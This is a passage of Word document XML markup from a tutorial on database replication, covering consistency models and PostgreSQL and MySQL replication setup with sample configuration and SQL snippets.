    <w:p w14:paraId="5D5E80AE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to achieve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B687C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Synchronous replication (write confirmed on all replicas before ACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52640548" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Reads from primary only (or from a replica that's provably up-to-date).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B89C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Consensus protocols (Raft, Paxos) for leader election and log replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50687C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C53FCE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Higher write latency (wait for all/quorum replicas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D84C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Lower availability (blocked if quorum is unreachable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A7517" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Lower throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AEE2A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Financial transactions, inventory management, access control, distributed locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F9002" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Eventual Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1472E4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If no new writes occur, all replicas will EVENTUALLY converge to the same value. But at any given moment, different replicas may have different values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8890B0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48236D14" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Asynchronous replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C7A80" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replicas receive updates at different times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699438FE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1525"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Given enough time with no new writes, all converge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B66D3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "eventually" could be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B84A4D7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Milliseconds (typical same-datacenter async replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB48D12" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Seconds (cross-region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94B186" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1526"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Minutes (severely lagging replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B2E2F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Used when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Social media feeds, product catalogs, user preferences — where brief staleness is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D78602" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Causal Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3CD8C2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If operation A causally precedes operation B, then ALL nodes see A before B. Concurrent (unrelated) operations may be seen in different orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854891C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CA9BF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA8F588" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User posts: "I got the job!" (event A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E020AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User updates status to "employed" (event B, caused by A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79523E26" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="63272593" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Causal consistency guarantees: nobody sees "employed" without also seeing "I got the job!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD95649" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>But concurrent posts from OTHER users may appear in any order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD01F35" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Vector clocks, logical timestamps, dependency tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A3BA6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 Read-After-Write Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF31D6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> A client that writes a value will always see that value (or a newer one) on subsequent reads. Other clients may see stale values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87B32F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation (covered in Section 5.4):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Route reads to primary for recently-written data, or track write timestamps and ensure replica has caught up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2071C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="7BE2449E">
          <v:rect id="_x0000_i5645" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507B2E3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Replication in Specific Database Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03666FA8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 PostgreSQL Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6348F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical (streaming) replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB1217" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1C26A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC2FFB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  wal_level = replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F970FF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  max_wal_senders = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70C50D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="7344321A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica (recovery.conf / standby.signal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42F9FF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  primary_conninfo = 'host=primary port=5432 user=replicator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D6A81" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  recovery_target_timeline = 'latest'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B998C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE8307" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary's WAL sender process connects to replica's WAL receiver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F255DFC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Streams WAL records continuously over TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07938077" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica writes to its own WAL (for crash recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B408B5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica's startup process replays WAL records to update data pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BED96D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1527"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica can serve read-only queries while replaying (hot standby).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A803FD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADCF22" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF03D78" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Primary postgresql.conf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A72F092" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>synchronous_standby_names = 'FIRST 1 (replica1, replica2)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683F1ED" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>synchronous_commit = on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4BF42" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="7889F641" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- This means: wait for at least 1 of the listed replicas to flush WAL before confirming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB90D0E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logical replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936AC39" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179F441" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Publisher (primary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C2A84" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>CREATE PUBLICATION all_tables FOR ALL TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818000B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="3BC663AA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Subscriber (replica):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EA370A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">CREATE SUBSCRIPTION my_sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E6301" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  CONNECTION 'host=primary dbname=mydb' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22391E8B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  PUBLICATION all_tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045573AC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Replication slots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D43314C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1528"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Ensure the primary retains WAL segments that the replica hasn't received yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C72A11" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1528"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Without slots: if replica falls far behind, primary may delete WAL it still needs → replica must be rebuilt from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5B8DF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1528"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>With slots: primary retains WAL indefinitely until replica confirms → risk: if replica dies permanently, WAL accumulates forever (disk fills up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B23608" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 MySQL Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF7D7E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binlog-based replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E012D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264FC9E1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E008EDC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  log_bin = mysql-bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56756AC2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  server_id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D7056" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  binlog_format = ROW  (row-based — most reliable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B879B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="6D2E2298" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF20088" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  CHANGE MASTER TO MASTER_HOST='primary', MASTER_USER='repl', ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B16AE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  START SLAVE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71F0AC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three binlog formats: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12"/>
